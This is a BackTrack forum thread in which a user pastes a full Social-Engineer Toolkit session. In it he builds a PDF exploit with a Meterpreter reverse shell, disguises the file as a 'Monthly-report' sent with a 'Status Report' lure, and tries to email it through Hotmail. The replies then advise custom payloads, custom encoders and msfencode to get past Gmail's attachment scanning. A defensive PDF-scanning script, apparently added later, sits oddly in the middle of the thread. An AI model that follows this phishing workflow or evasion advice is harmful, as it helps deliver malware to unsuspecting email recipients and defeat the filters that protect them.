
Thread: SET & Spear Phishing PDF caught

  1. #1
    Just burned his ISO (Join Date: Oct 2011, Posts: 13)

    SET & Spear Phishing PDF caught

    I am running BT 5 x32-bit Gnome in VirtualBox and I am testing the spear-phishing attack vector in SET.
    I have 2 questions.
    1st, I have followed the tutorial found at Dave Kennedy's site (http://www.secmaniac.com/) and I am receiving the following error: [!] Unable to deliver email. Printing exceptions message below, this is most likely due to an illegal attachment. If using GMAIL they inspect PDFs and is most likely getting caught.
    So I have changed the provider to Hotmail and I got the error described in the second point. Has anyone else encountered the same issue?

    2nd, I had another error; below are the steps I did:

    Code:
    set> 1
    
     The Spearphishing module allows you to specially craft email messages and send
     them to a large (or small) number of people with attached fileformat malicious
     payloads. If you want to spoof your email address, be sure "Sendmail" is in-
     stalled (it is installed in BT4) and change the config/set_config SENDMAIL=OFF
     flag to SENDMAIL=ON.
    
     There are two options, one is getting your feet wet and letting SET do
     everything for you (option 1), the second is to create your own FileFormat
     payload and use it in your own attack. Either way, good luck and enjoy!
    
       1) Perform a Mass Email Attack
       2) Create a FileFormat Payload
       3) Create a Social-Engineering Template
    
      99) Return to Main Menu
    
    set:phishing>1
    
     Select the file format exploit you want.
     The default is the PDF embedded EXE.
    
               ********** PAYLOADS **********
    
       1) SET Custom Written DLL Hijacking Attack Vector (RAR, ZIP)
       2) SET Custom Written Document UNC LM SMB Capture Attack
       3) Microsoft Windows CreateSizedDIBSECTION Stack Buffer Overflow
       4) Microsoft Word RTF pFragments Stack Buffer Overflow (MS10-087)
       5) Adobe Flash Player "Button" Remote Code Execution
       6) Adobe CoolType SING Table "uniqueName" Overflow
       7) Adobe Flash Player "newfunction" Invalid Pointer Use
       8) Adobe Collab.collectEmailInfo Buffer Overflow
       9) Adobe Collab.getIcon Buffer Overflow
      10) Adobe JBIG2Decode Memory Corruption Exploit
      11) Adobe PDF Embedded EXE Social Engineering
      12) Adobe util.printf() Buffer Overflow
      13) Custom EXE to VBA (sent via RAR) (RAR required)
      14) Adobe U3D CLODProgressiveMeshDeclaration Array Overrun
      15) Adobe PDF Embedded EXE Social Engineering (NOJS)
      16) Foxit PDF Reader v4.1.1 Title Stack Buffer Overflow
      17) Apple QuickTime PICT PnSize Buffer Overflow
      18) Nuance PDF Reader v6.0 Launch Stack Buffer Overflow
    
    set:payloads>12
    
    
    
       1) Windows Reverse TCP Shell              Spawn a command shell on victim and send back to attacker
       2) Windows Meterpreter Reverse_TCP        Spawn a meterpreter shell on victim and send back to attacker
       3) Windows Reverse VNC DLL                Spawn a VNC server on victim and send back to attacker
       4) Windows Reverse TCP Shell (x64)        Windows X64 Command Shell, Reverse TCP Inline
       5) Windows Meterpreter Reverse_TCP (X64)  Connect back to the attacker (Windows x64), Meterpreter
       6) Windows Shell Bind_TCP (X64)           Execute payload and create an accepting port on remote system
       7) Windows Meterpreter Reverse HTTPS      Tunnel communication over HTTP using SSL and use Meterpreter
    
    set:payloads>2
    set> IP address for the payload listener: 192.168.10.3
    set:payloads> Port to connect back on [443]:443
    [-] Generating fileformat exploit...[*] Payload creation complete.[*] All payloads get sent to the /pentest/exploits/set/src/program_junk/template.pdf directory
    [-] As an added bonus, use the file-format creator in SET to create your attachment.
    
       Right now the attachment will be imported with filename of 'template.whatever'
    
       Do you want to rename the file?
    
       example Enter the new filename: moo.pdf
    
        1. Keep the filename, I don't care.
        2. Rename the file, I want to be cool.
    
    set:phishing>2
    set:phishing> New filename:Monthly-report [*] Filename changed, moving on...
    
       Social Engineer Toolkit Mass E-Mailer
    
       There are two options on the mass e-mailer, the first would
       be to send an email to one individual person. The second option
       will allow you to import a list and send it to as many people as
       you want within that list.
    
       What do you want to do:
    
       1.  E-Mail Attack Single Email Address
       2.  E-Mail Attack Mass Mailer
    
       99. Return to main menu.
       
    set:phishing>1
    
       Do you want to use a predefined template or craft
       a one time email template. 
    
       1. Pre-Defined Template
       2. One-Time Use Email Template
    
    set:phishing>1
    [-] Available templates:
    1: Have you seen this?
    2: Strange internet usage from your computer
    3: WOAAAA!!!!!!!!!! This is crazy...
    4: Dan Brown's Angels & Demons
    5: How long has it been?
    6: New Update
    7: Computer Issue
    8: Baby Pics
    9: Status Report
    set:phishing>9
    set:phishing> Send email to:testdeset1@gmail.com
    
      1. Use a hotmail Account for your email attack.
      2. Use your own server or open relay
    
    set:phishing>1
    set:phishing> Your hotmail email address: :testdeset2@hotmail.com
    Email password: 
    set:phishing> Flag this message/s as high priority? [yes|no]:y
    Traceback (most recent call last):
      File "./set", line 103, in <module>
        import src.core.set
      File "/pentest/exploits/set/src/core/set.py", line 82, in <module>
        import create_payload
      File "src/core/msf_attacks/create_payload.py", line 188, in <module>
        except: import smtp_client
      File "src/phishing/smtp/client/smtp_client.py", line 376, in <module>
        mail("%s" % (to), subject, body, "%s" % (file_format), prioflag1, prioflag2)
      File "src/phishing/smtp/client/smtp_client.py", line 332, in mail
        mailServer = smtplib.SMTP(smtp, int(port))
      File "/usr/lib/python2.6/smtplib.py", line 239, in __init__
        (code, msg) = self.connect(host, port)
      File "/usr/lib/python2.6/smtplib.py", line 295, in connect
        self.sock = self._get_socket(host, port, self.timeout)
      File "/usr/lib/python2.6/smtplib.py", line 273, in _get_socket
        return socket.create_connection((port, host), timeout)
      File "/usr/lib/python2.6/socket.py", line 500, in create_connection
        for res in getaddrinfo(host, port, 0, SOCK_STREAM):
    socket.gaierror: [Errno -2] Name or service not known
    root@bt:/pentest/exploits/set#
    I do not know the Python language; I have checked those files and I cannot understand anything. I have looked in the forum, googled it, and found nothing.
    Any ideas what is going on?? Thank you

  2. #2
    sickness, Administrator (Join Date: Jan 2010, Location: Behind the screen., Posts: 2,921)

    Re: SET & Spear Phishing PDF caught

    If you read the error message ... you can actually see it tells you that most probably GMAIL has detected your payload inside the PDF, in which case it will not let you send it.
    Back|track giving machine guns to monkeys since 2007 !

    Do not read the Wiki, most your questions will not be answered there !
    Do not take a look at the: Forum Rules !
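The error quoted in the first post and the reply above come down to the same thing: mail providers inspect PDF attachments for the features the SET payload menu relies on (embedded files, launch actions, JavaScript). As an added example written from the defender's side, and not code from SET or from anyone in this thread, here is a small static check that flags those PDF name objects and inflates FlateDecode streams to look for an embedded Windows executable; the two sample PDFs it builds are constructed fixtures, not valid documents.

```python
import re
import zlib

# PDF name objects the embedded-EXE and JavaScript-based attachments in the SET
# payload menu rely on. Their presence is a signal worth flagging, not proof of malice.
RISKY_NAMES = {
    b"/EmbeddedFile": "embedded file attachment",
    b"/Launch": "launch action (runs an external program)",
    b"/JavaScript": "JavaScript action",
    b"/JS": "inline JavaScript",
    b"/OpenAction": "action triggered on open",
    b"/RichMedia": "embedded Flash/rich media",
}
STREAM_RE = re.compile(rb"stream\r?\n(.*?)endstream", re.DOTALL)  # one match per stream

def stream_bodies(pdf):
    """Yield each stream body, inflating FlateDecode streams that decompress cleanly."""
    for m in STREAM_RE.finditer(pdf):
        head = pdf[max(0, m.start() - 300):m.start()]  # the stream's dictionary
        if b"/FlateDecode" not in head:
            yield m.group(1)
            continue
        try:
            yield zlib.decompress(m.group(1))  # zlib ignores the trailing newline
        except zlib.error:
            yield b""  # damaged or obfuscated stream: nothing to inspect

def scan_pdf(pdf):
    """Return findings for a PDF byte string; an empty list means nothing was flagged."""
    findings = [desc for name, desc in RISKY_NAMES.items()
                if re.search(re.escape(name) + rb"(?![A-Za-z0-9])", pdf)]
    for body in stream_bodies(pdf):
        # A Windows PE dropped via /EmbeddedFile starts with the 'MZ' DOS header.
        if body.startswith(b"MZ") and b"This program cannot be run in DOS mode" in body:
            findings.append("PE executable inside a stream")
            break
    return findings

def build_sample(malicious):
    """Constructed minimal PDF fixture for exercising the scanner (not a valid, working file)."""
    if not malicious:
        return (b"%PDF-1.4\n1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj\n"
                b"3 0 obj << /Length 35 >>\nstream\nBT /F1 12 Tf (Monthly report) Tj ET\n"
                b"endstream\nendobj\n%%EOF\n")
    fake_pe = zlib.compress(b"MZ\x90\x00" + b"\x00" * 60 + b"This program cannot be run in DOS mode")
    return (b"%PDF-1.4\n1 0 obj << /Type /Catalog /OpenAction 4 0 R >> endobj\n"
            b"4 0 obj << /S /Launch /F (report.exe) >> endobj\n"
            b"5 0 obj << /Type /EmbeddedFile /Filter /FlateDecode /Length "
            + str(len(fake_pe)).encode() + b" >>\nstream\n" + fake_pe + b"\nendstream\nendobj\n%%EOF\n")
```

Run `scan_pdf(build_sample(True))` against `scan_pdf(build_sample(False))` to see the difference a gateway scanner keys on; a real filter would additionally walk the object tree rather than rely on raw byte matching.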

  3. #3
    Just burned his ISO (Join Date: Oct 2011, Posts: 13)

    Re: SET & Spear Phishing PDF caught

    I understand the warning. So, any ideas how to evade this? Because when I watched a couple of vids it appears that it is working. Is anybody else facing the same issue?

  4. #4
    sickness, Administrator (Join Date: Jan 2010, Location: Behind the screen., Posts: 2,921)

    Re: SET & Spear Phishing PDF caught

    Metasploit payloads are getting detected often, so the best way is to create your own payload + your own encoder.

  5. #5
    Just burned his ISO (Join Date: Apr 2012, Posts: 6)

    Re: SET & Spear Phishing PDF caught

    msfencode is your new friend.
